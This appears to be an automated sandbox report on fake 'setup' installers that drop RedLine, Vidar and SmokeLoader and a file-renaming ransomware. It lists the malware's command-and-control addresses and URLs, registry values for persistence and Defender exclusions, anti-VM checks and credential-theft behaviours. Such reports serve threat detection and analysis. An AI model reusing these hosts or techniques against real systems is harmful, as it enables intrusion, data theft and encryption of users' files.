Overview
overview
10Static
static
setup_x86_...0).exe
windows7_x64
setup_x86_...0).exe
windows10_x64
setup_x86_...1).exe
windows7_x64
setup_x86_...1).exe
windows10_x64
setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
10setup_x86_...4).exe
windows7_x64
10setup_x86_...4).exe
windows10_x64
setup_x86_...5).exe
windows7_x64
setup_x86_...5).exe
windows10_x64
10setup_x86_...6).exe
windows7_x64
setup_x86_...6).exe
windows10_x64
10setup_x86_...7).exe
windows7_x64
10setup_x86_...7).exe
windows10_x64
10setup_x86_...8).exe
windows7_x64
setup_x86_...8).exe
windows10_x64
setup_x86_...9).exe
windows7_x64
setup_x86_...9).exe
windows10_x64
10setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
10setup_x86_...0).exe
windows7_x64
setup_x86_...0).exe
windows10_x64
10setup_x86_...1).exe
windows7_x64
setup_x86_...1).exe
windows10_x64
10setup_x86_...2).exe
windows7_x64
setup_x86_...2).exe
windows10_x64
setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
setup_x86_...3).exe
windows7_x64
setup_x86_...3).exe
windows10_x64
Resubmissions
11-07-2024 05:43
240711-gej4lstgrf 1006-09-2021 14:13
210906-rjpvrsedbm 1008-07-2021 11:08
210708-4gztl3mwl6 1008-07-2021 08:02
210708-klfb4qeda6 1007-07-2021 09:39
210707-nem57xyvf2 1006-07-2021 17:51
210706-7pcrmjy3fa 1006-07-2021 13:45
210706-eybelwcq86 10Analysis
-
max time kernel
1800s -
max time network
1806s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
06-07-2021 17:51
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install - копия (10).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
setup_x86_x64_install - копия (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
setup_x86_x64_install - копия (11).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
setup_x86_x64_install - копия (11).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
setup_x86_x64_install - копия (12).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
setup_x86_x64_install - копия (12).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
setup_x86_x64_install - копия (13).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
setup_x86_x64_install - копия (13).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
setup_x86_x64_install - копия (14).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
setup_x86_x64_install - копия (14).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
setup_x86_x64_install - копия (15).exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
setup_x86_x64_install - копия (15).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
setup_x86_x64_install - копия (16).exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
setup_x86_x64_install - копия (16).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
setup_x86_x64_install - копия (17).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
setup_x86_x64_install - копия (17).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
setup_x86_x64_install - копия (18).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
setup_x86_x64_install - копия (18).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
setup_x86_x64_install - копия (19).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
setup_x86_x64_install - копия (19).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
setup_x86_x64_install - копия (2).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
setup_x86_x64_install - копия (2).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
setup_x86_x64_install - копия (20).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
setup_x86_x64_install - копия (20).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
setup_x86_x64_install - копия (21).exe
Resource
win7v20210410
Behavioral task
behavioral26
Sample
setup_x86_x64_install - копия (21).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
setup_x86_x64_install - копия (22).exe
Resource
win7v20210410
Behavioral task
behavioral28
Sample
setup_x86_x64_install - копия (22).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
setup_x86_x64_install - копия (23).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
setup_x86_x64_install - копия (23).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
setup_x86_x64_install - копия (3).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
setup_x86_x64_install - копия (3).exe
Resource
win10v20210410
General
-
Target
setup_x86_x64_install - копия (2).exe
Malware Config
Extracted
C:\_readme.txt
https://we.tl/t-fhnNOAYC8Z
Extracted
redline
ServAni
87.251.71.195:82
Extracted
vidar
39.4
706
https://sergeevih43.tumblr.com
-
profile_id
706
Extracted
smokeloader
2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
Signatures
-
resource yara_rule behavioral22/memory/4560-368-0x0000000005460000-0x0000000005A66000-memory.dmp Discord_stealer -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5184 5576 rUNdlL32.eXe 163 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 2076 rUNdlL32.eXe 261 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral22/memory/4164-242-0x0000000002ED0000-0x0000000002F08000-memory.dmp family_redline behavioral22/memory/940-230-0x0000000000417F26-mapping.dmp family_redline behavioral22/memory/940-226-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral22/memory/4560-354-0x0000000000417E96-mapping.dmp family_redline behavioral22/memory/1900-352-0x0000000000418392-mapping.dmp family_redline behavioral22/memory/2464-364-0x0000000000417E4A-mapping.dmp family_redline behavioral22/memory/2388-363-0x0000000000417E8E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 5400 created 4188 5400 WerFault.exe 124 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 5972 created 4360 5972 svchost.exe 122 PID 5972 created 4160 5972 svchost.exe 279 PID 5972 created 3572 5972 svchost.exe 307 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral22/memory/3780-295-0x00000000025C0000-0x000000000265D000-memory.dmp family_vidar behavioral22/memory/3780-296-0x0000000000400000-0x0000000000949000-memory.dmp family_vidar -
resource yara_rule behavioral22/files/0x000100000001abb6-118.dat aspack_v212_v242 behavioral22/files/0x000100000001abb6-119.dat aspack_v212_v242 behavioral22/files/0x000100000001abb1-123.dat aspack_v212_v242 behavioral22/files/0x000100000001abb4-129.dat aspack_v212_v242 behavioral22/files/0x000100000001abb4-127.dat aspack_v212_v242 behavioral22/files/0x000100000001abb1-122.dat aspack_v212_v242 behavioral22/files/0x000100000001abb2-121.dat aspack_v212_v242 behavioral22/files/0x000100000001abb2-120.dat aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts èeèrgegdè_éçè_)))_.exe -
Executes dropped EXE 64 IoCs
pid Process 2628 setup_installer.exe 2912 setup_install.exe 3776 arnatic_5.exe 3780 arnatic_1.exe 3668 arnatic_6.exe 3792 arnatic_2.exe 2688 arnatic_4.exe 3784 7652125.exe 200 arnatic_7.exe 4060 jfiag3g_gg.exe 3784 7652125.exe 4124 3778696.exe 4164 5925079.exe 4232 8769103.exe 940 arnatic_7.exe 4752 WinHoster.exe 5096 jfiag3g_gg.exe 4192 tfdu8XtDOfXPnWd5eic44TKh.exe 4872 8PLi7IRYRVIXSHURBhMNutEk.exe 4824 EwraqqCU0HVAQRUvP9TYxhGI.exe 4396 XkJSC5ixDkJb1rPMd3LcfZCv.exe 4904 c7Hb6tzXOIGRFte2abYPnnBY.exe 4944 MwtbK1POk82NmozS0BnBfPV2.exe 648 jfiag3g_gg.exe 2304 lgv6zTWQ7L6TVr7lRCVCJTCH.exe 2276 7pp5jxbY39jJYhWWIeaMx7Qr.exe 4208 FFjUwaq1iIz8jEoT3jXTT2G_.exe 4976 J1bgqjxv66LqSsnbDG0ILQWr.exe 5004 qwVH64SGS_tVOCmCfrN7rulp.exe 2916 KJ8KOGKTrbSPADmv6gtY6AMA.exe 4744 _v9lnYddXaDJtC6Q9yUec7k_.exe 4188 tGb3YwXovxcTQXloY7p_M8QX.exe 4360 VLTUrZtw2dcC7WCHvQnooQgO.exe 4044 UY_2GTcIfYY5g4By6LEO0bes.exe 1896 v6KWaxKyS61D1G8XZ7rRXxt_.exe 1336 JKT8aecd_mABUFT2yA_MY8he.exe 2204 file4.exe 2328 jooyu.exe 2500 jingzhang.exe 4764 md8_8eus.exe 1900 slui.exe 5092 jwhurww 4560 7pp5jxbY39jJYhWWIeaMx7Qr.exe 2240 chrome.exe 4280 lgv6zTWQ7L6TVr7lRCVCJTCH.exe 2388 chrome.exe 2464 JS4F4nRDdszK6lMK38Ep_tqo.exe 648 jfiag3g_gg.exe 5124 JKT8aecd_mABUFT2yA_MY8he.exe 5440 chrome.exe 6032 tfdu8XtDOfXPnWd5eic44TKh.exe 5968 jfiag3g_gg.exe 4320 F9DD.exe 4368 VLTUrZtw2dcC7WCHvQnooQgO.exe 5484 3193.exe 4328 3359.exe 2892 timeout.exe 4232 912A.exe 5016 94E4.exe 5248 9979.exe 4956 9EBA.exe 4464 Convertira.exe.com 5516 1C3E.exe 4644 MicrosoftEdgeCP.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\OutConvertFrom.raw => C:\Users\Admin\Pictures\OutConvertFrom.raw.pooe FB15.exe File renamed C:\Users\Admin\Pictures\SkipDisconnect.crw => C:\Users\Admin\Pictures\SkipDisconnect.crw.pooe FB15.exe File renamed C:\Users\Admin\Pictures\SubmitUnpublish.tif => C:\Users\Admin\Pictures\SubmitUnpublish.tif.pooe FB15.exe File renamed C:\Users\Admin\Pictures\SuspendImport.tif => C:\Users\Admin\Pictures\SuspendImport.tif.pooe FB15.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral22/files/0x000100000001abbb-175.dat upx behavioral22/files/0x000100000001abbb-174.dat upx behavioral22/files/0x000100000001abd5-289.dat upx behavioral22/files/0x000100000001abd5-290.dat upx -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion XkJSC5ixDkJb1rPMd3LcfZCv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FFjUwaq1iIz8jEoT3jXTT2G_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FFjUwaq1iIz8jEoT3jXTT2G_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion XkJSC5ixDkJb1rPMd3LcfZCv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c7Hb6tzXOIGRFte2abYPnnBY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c7Hb6tzXOIGRFte2abYPnnBY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F9DD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MwtbK1POk82NmozS0BnBfPV2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion J1bgqjxv66LqSsnbDG0ILQWr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion J1bgqjxv66LqSsnbDG0ILQWr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F9DD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion timeout.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion timeout.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MwtbK1POk82NmozS0BnBfPV2.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation 7652125.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation arnatic_6.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation jingzhang.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Regekuvuqi.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation NMemo3Setp.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pGRKIRrjSW.url Convertira.exe.com -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Wine c7Hb6tzXOIGRFte2abYPnnBY.exe -
Loads dropped DLL 64 IoCs
pid Process 2912 setup_install.exe 2912 setup_install.exe 2912 setup_install.exe 2912 setup_install.exe 2912 setup_install.exe 1000 rUNdlL32.eXe 3792 arnatic_2.exe 3780 chrome.exe 3780 chrome.exe 4104 chrome.exe 5440 chrome.exe 5764 Conhost.exe 5432 rundll32.exe 2916 KJ8KOGKTrbSPADmv6gtY6AMA.exe 2916 KJ8KOGKTrbSPADmv6gtY6AMA.exe 4904 c7Hb6tzXOIGRFte2abYPnnBY.exe 4904 c7Hb6tzXOIGRFte2abYPnnBY.exe 4320 F9DD.exe 4320 F9DD.exe 5092 jwhurww 4232 912A.exe 5016 94E4.exe 5016 94E4.exe 5016 94E4.exe 5016 94E4.exe 5016 94E4.exe 644 A97.tmp 5516 1C3E.exe 5516 1C3E.exe 5188 LabPicV3.exe 5188 LabPicV3.exe 4744 regsvr32.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 5776 I-Record.exe 4392 Setup3310.tmp 4392 Setup3310.tmp 2088 toolspab1.exe 4804 rundll32.exe 6876 rUNdlL32.eXe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe 6776 SunLabsPlayer.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4368 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral22/files/0x000100000001abfb-322.dat themida behavioral22/files/0x000100000001abfb-323.dat themida behavioral22/files/0x000100000001ac00-326.dat themida behavioral22/files/0x000100000001ac00-327.dat themida -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QRIvBFx = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\91b39c1d-9ff8-4ddd-8a74-5322b80fb6ae\\FB15.exe\" --AutoStart" FB15.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Nofukibypae.exe\"" èeèrgegdè_éçè_)))_.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3778696.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FFjUwaq1iIz8jEoT3jXTT2G_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA J1bgqjxv66LqSsnbDG0ILQWr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F9DD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8B2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lylal220.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XkJSC5ixDkJb1rPMd3LcfZCv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MwtbK1POk82NmozS0BnBfPV2.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json 2C5D.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 467 api.2ip.ua 908 api.2ip.ua 982 api.2ip.ua 55 ipinfo.io 459 api.2ip.ua 543 ipinfo.io 54 ipinfo.io 205 checkip.amazonaws.com 759 api.2ip.ua 1482 api.2ip.ua 11 ip-api.com 545 ipinfo.io 565 ip-api.com 758 api.2ip.ua 907 api.2ip.ua 983 api.2ip.ua 1234 api.2ip.ua 1481 api.2ip.ua 460 api.2ip.ua 1659 api.2ip.ua -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 0EAA76D53D35AA6F svchost.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\Tasks\QRIvBFx svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 496E5209932D8157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 037E8580802BAC29 svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4744 regsvr32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4396 XkJSC5ixDkJb1rPMd3LcfZCv.exe 4944 MwtbK1POk82NmozS0BnBfPV2.exe 4208 FFjUwaq1iIz8jEoT3jXTT2G_.exe 4904 c7Hb6tzXOIGRFte2abYPnnBY.exe 4976 J1bgqjxv66LqSsnbDG0ILQWr.exe 4320 F9DD.exe 2892 timeout.exe -
Suspicious use of SetThreadContext 22 IoCs
description pid Process procid_target PID 2556 set thread context of 2628 2556 svchost.exe 97 PID 200 set thread context of 940 200 arnatic_7.exe 95 PID 5004 set thread context of 1900 5004 qwVH64SGS_tVOCmCfrN7rulp.exe 241 PID 2276 set thread context of 4560 2276 7pp5jxbY39jJYhWWIeaMx7Qr.exe 137 PID 2304 set thread context of 2388 2304 lgv6zTWQ7L6TVr7lRCVCJTCH.exe 236 PID 648 set thread context of 2464 648 jfiag3g_gg.exe 145 PID 4872 set thread context of 5440 4872 8PLi7IRYRVIXSHURBhMNutEk.exe 221 PID 4192 set thread context of 6032 4192 tfdu8XtDOfXPnWd5eic44TKh.exe 167 PID 4164 set thread context of 5616 4164 taskkill.exe 270 PID 3508 set thread context of 4868 3508 qXK~CwG.exe 275 PID 5840 set thread context of 5188 5840 build2.exe 360 PID 304 set thread context of 1156 304 lakgljeh.exe 339 PID 4480 set thread context of 2088 4480 toolspab1.exe 368 PID 3908 set thread context of 5592 3908 Convertira.exe.com 410 PID 5140 set thread context of 5680 5140 FB15.exe 427 PID 6988 set thread context of 6740 6988 FB15.exe 468 PID 4744 set thread context of 6724 4744 crhurww 475 PID 5736 set thread context of 1464 5736 FB15.exe 477 PID 1552 set thread context of 1816 1552 FB15.exe 487 PID 6704 set thread context of 2212 6704 crhurww 497 PID 6900 set thread context of 5928 6900 FB15.exe 500 PID 6844 set thread context of 6984 6844 FB15.exe 507 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe UY_2GTcIfYY5g4By6LEO0bes.exe File created C:\Program Files (x86)\i-record\is-ECRTP.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll SunLabsPlayer.exe File created C:\Program Files\Windows NT\ENRUHKUANA\irecord.exe èeèrgegdè_éçè_)))_.exe File opened for modification C:\Program Files (x86)\i-record\avformat-53.dll irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll SunLabsPlayer.exe File created C:\Program Files\temp_files\cache.dat data_load.exe File opened for modification C:\Program Files (x86)\i-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\QRIvBFx powershell.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File opened for modification C:\Program Files (x86)\i-record\avdevice-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\avcodec-53.dll irecord.tmp File opened for modification C:\Program Files (x86)\i-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\Data Finder\Versium Research\tmp.edb lylal220.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll SunLabsPlayer.exe File created C:\Program Files\temp_files\bckf.fon data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\i-record\is-8TOF9.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\i-record\unins000.dat irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll powershell.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\i-record\is-EKI17.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files\temp_files\QRIvBFx.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll SunLabsPlayer.exe File created C:\Program Files\temp_files\QRIvBFx.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll SunLabsPlayer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
